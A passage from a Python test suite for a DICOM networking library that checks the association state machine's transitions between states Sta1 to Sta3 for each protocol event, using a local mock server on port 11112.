fsm.original_action(event)
fsm.do_action = do_action
return fsm
def start_server(self, commands):
"""Start the receiving server."""
server = ThreadedParrot(('', 11112), commands)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
return server
def print_fsm_scp(self, fsm, scp=None):
"""Print out some of the quantities we're interested in."""
print('Transitions', fsm._transitions)
print('Changes')
for change in fsm._changes:
print('\t{}'.format(change))
print('Events', fsm._events)
if scp and scp.handlers:
print('Received', scp.handlers[0].received)
print('Sent', scp.handlers[0].sent)
def get_acceptor_assoc(self):
# AF_INET: IPv4, SOCK_STREAM: TCP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(
socket.SOL_SOCKET,
socket.SO_RCVTIMEO,
pack('ll', 1, 0)
)
sock.connect(('', 11112))
ae = AE()
ae.add_supported_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='acceptor')
assoc.set_socket(AssociationSocket(assoc, client_socket=sock))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ''
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.acceptor.supported_contexts = [cx]
fsm = self.monkey_patch(assoc.dul.state_machine)
return assoc, fsm
class TestState01(TestStateBase):
"""Tests for State 01: Idle."""
def test_evt01(self):
"""Test Sta1 + Evt1."""
# Sta1 + Evt1 -> AE-1 -> Sta4
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
# AE-1: Issue TRANSPORT_CONNECT primitive to <transport service>
commands = [
('recv', None),
('send', a_abort)
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:1] == ['Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta1 + Evt2."""
# Sta1 + Evt2 -> <ignore> -> Sta1
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta1 + Evt3."""
# Sta1 + Evt3 -> <ignore> -> Sta1
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
commands = [
('send', a_associate_ac),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt3']
def test_evt04(self):
"""Test Sta1 + Evt4."""
# Sta1 + Evt4 -> <ignore> -> Sta1
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
commands = [
('send', a_associate_rj),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta1 + Evt5."""
# Sta1 + Evt5 -> AE-5 -> Sta2
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
# AE-5: Issue TRANSPORT_RESPONSE to <transport service>
# Start ARTIM timer
pass
def test_evt06(self):
"""Test Sta1 + Evt6."""
# Sta1 + Evt6 -> <ignore> -> Sta1
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
commands = [
('send', a_associate_rq),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt6']
def test_evt07(self):
"""Test Sta1 + Evt7."""
# Sta1 + Evt7 -> <ignore> -> Sta1
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt7'
def test_evt08(self):
"""Test Sta1 + Evt8."""
# Sta1 + Evt8 -> <ignore> -> Sta1
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt8'
assert self.fsm.current_state == 'Sta1'
def test_evt09(self):
"""Test Sta1 + Evt9."""
# Sta1 + Evt9 -> <ignore> -> Sta1
# Evt9: Receive P-DATA primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt9'
assert self.fsm.current_state == 'Sta1'
def test_evt10(self):
"""Test Sta1 + Evt10."""
# Sta1 + Evt10 -> <ignore> -> Sta1
# Evt10: Receive P-DATA-TF PDU from <remote>
commands = [
('send', p_data_tf),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt10']
def test_evt11(self):
"""Test Sta1 + Evt11."""
# Sta1 + Evt11 -> <ignore> -> Sta1
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt11'
assert self.fsm.current_state == 'Sta1'
def test_evt12(self):
"""Test Sta1 + Evt12."""
# Sta1 + Evt12 -> <ignore> -> Sta1
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
commands = [
('send', a_release_rq),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt12']
def test_evt13(self):
"""Test Sta1 + Evt13."""
# Sta1 + Evt13 -> <ignore> -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
commands = [
('send', a_release_rp),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt13']
def test_evt14(self):
"""Test Sta1 + Evt14."""
# Sta1 + Evt14 -> <ignore> -> Sta1
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt14'
assert self.fsm.current_state == 'Sta1'
def test_evt15(self):
"""Test Sta1 + Evt15."""
# Sta1 + Evt15 -> <ignore> -> Sta1
# Evt15: Receive A-ABORT (rq) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_abort(False))
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt15'
assert self.fsm.current_state == 'Sta1'
def test_evt16(self):
"""Test Sta1 + Evt16."""
# Sta1 + Evt16 -> <ignore> -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
commands = [
('send', a_abort),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt16']
def test_evt17(self):
"""Test Sta1 + Evt17."""
# Sta1 + Evt17 -> <ignore> -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
commands = []
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt17']
def test_evt18(self):
"""Test Sta1 + Evt18."""
# Sta1 + Evt18 -> <ignore> -> Sta1
# Evt18: ARTIM timer expired from <local service>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
self.assoc.kill()
assert self.assoc.dul.artim_timer.expired
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt18'
assert self.fsm.current_state == 'Sta1'
def test_evt19(self):
"""Test Sta1 + Evt19."""
# Sta1 + Evt19 -> <ignore> -> Sta1
# Evt19: Received unrecognised or invalid PDU from <remote>
commands = [
('send', b'\x08\x00\x00\x00\x00\x00\x00'),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt19']
class TestState02(TestStateBase):
"""Tests for State 02: Connection open, waiting for A-ASSOCIATE-RQ."""
def test_evt01(self):
"""Test Sta2 + Evt1."""
# Sta2 + Evt1 -> <ignore> -> Sta2
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta2 + Evt2."""
# Sta2 + Evt2 -> <ignore> -> Sta2
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta2 + Evt3."""
# Sta2 + Evt3 -> AA-1 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_associate_ac),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt3', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt3']
def test_evt04(self):
"""Test Sta2 + Evt4."""
# Sta2 + Evt4 -> AA-1 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_associate_rj),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt4', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta2 + Evt5."""
# Sta2 + Evt5 -> <ignore> -> Sta2
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06a(self):
"""Test Sta2 + Evt6."""
# Sta2 + Evt6 -> AE-6 -> **Sta3** or Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AE-6: Stop ARTIM, issue A-ASSOCIATE or A-ASSOCIATE-RJ PDU
commands = [
('send', a_associate_rq),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6')
]
assert fsm._events[:2] == ['Evt5', 'Evt6']
def test_evt06b(self):
"""Test Sta2 + Evt6."""
# Sta2 + Evt6 -> AE-6 -> Sta3 or **Sta13**
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AE-6: Stop ARTIM, issue A-ASSOCIATE or A-ASSOCIATE-RJ PDU
bad_request = a_associate_rq[:6] + b'\x00\x02' + a_associate_rq[8:]
assert len(bad_request) == len(a_associate_rq)
commands = [
('send', bad_request),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6')
]
assert fsm._events[:2] == ['Evt5', 'Evt6']
def test_evt07(self):
"""Test Sta2 + Evt7."""
# Sta2 + Evt7 -> <ignore> -> Sta2
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt7']
def test_evt08(self):
"""Test Sta2 + Evt8."""
# Sta2 + Evt8 -> <ignore> -> Sta2
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt8']
def test_evt09(self):
"""Test Sta2 + Evt9."""
# Sta2 + Evt9 -> <ignore> -> Sta2
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt9']
def test_evt10(self):
"""Test Sta2 + Evt10."""
# Sta2 + Evt10 -> AA-1 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', p_data_tf),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt10', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt10']
def test_evt11(self):
"""Test Sta2 + Evt11."""
# Sta2 + Evt11 -> <ignore> -> Sta2
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt11']
def test_evt12(self):
"""Test Sta2 + Evt12."""
# Sta2 + Evt12 -> AA-1 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_release_rq),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt12', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt12']
def test_evt13(self):
"""Test Sta2 + Evt13."""
# Sta2 + Evt13 -> AA-1 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_release_rp),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt13', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt13']
def test_evt14(self):
"""Test Sta2 + Evt14."""
# Sta2 + Evt14 -> <ignore> -> Sta2
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt14']
def test_evt15(self):
"""Test Sta2 + Evt15."""
# Sta2 + Evt15 -> <ignore> -> Sta2
# Evt15: Receive A-ABORT (rq) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt15']
def test_evt16(self):
"""Test Sta2 + Evt16."""
# Sta2 + Evt16 -> AA-2 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-2: Stop ARTIM, close connection
commands = [
('send', a_abort),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta1']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt16', 'AA-2')
]
assert fsm._events[:2] == ['Evt5', 'Evt16']
def test_evt17(self):
"""Test Sta2 + Evt17."""
# Sta2 + Evt17 -> AA-5 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-5: Stop ARTIM timer
commands = []
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta1']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt17', 'AA-5')
]
assert fsm._events[:2] == ['Evt5', 'Evt17']
def test_evt18(self):
"""Test Sta2 + Evt18."""
# Sta2 + Evt18 -> AA-2 -> Sta1
# Evt18: ARTIM timer expired from <local service>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt18']
def test_evt19(self):
"""Test Sta2 + Evt19."""
# Sta2 + Evt19 -> AA-1 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt19', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt19']
class TestState03(TestStateBase):
"""Tests for State 03: Awaiting A-ASSOCIATE (rsp) primitive."""
def test_evt01(self):
"""Test Sta3 + Evt1."""
# Sta3 + Evt1 -> <ignore> -> Sta3
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
pass
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta3 + Evt2."""
# Sta3 + Evt2 -> <ignore> -> Sta3
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta3 + Evt3."""
# Sta3 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_associate_ac),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt3', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt3']
def test_evt04(self):
"""Test Sta3 + Evt4."""
# Sta3 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_associate_rj),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt4', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta3 + Evt5."""
# Sta3 + Evt5 -> <ignore> -> Sta3
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta3 + Evt6."""
# Sta3 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt6', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt6']
def test_evt07(self):
"""Test Sta3 + Evt7."""
# Sta3 + Evt7 -> AE-7 -> Sta6
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
# AE-7: Send A-ASSOCIATE-AC PDU
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:3] == ['Sta2', 'Sta3', 'Sta6']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt7']
def test_evt08(self):
"""Test Sta3 + Evt8."""
# Sta3 + Evt8 -> AE-8 -> Sta13
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
# AE-8: Send A-ASSOCIATE-RJ PDU and start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_associate('reject'))
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt8', 'AE-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt8']
def test_evt09(self):
"""Test Sta3 + Evt9."""
# Sta3 + Evt9 -> <ignore> -> Sta3
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
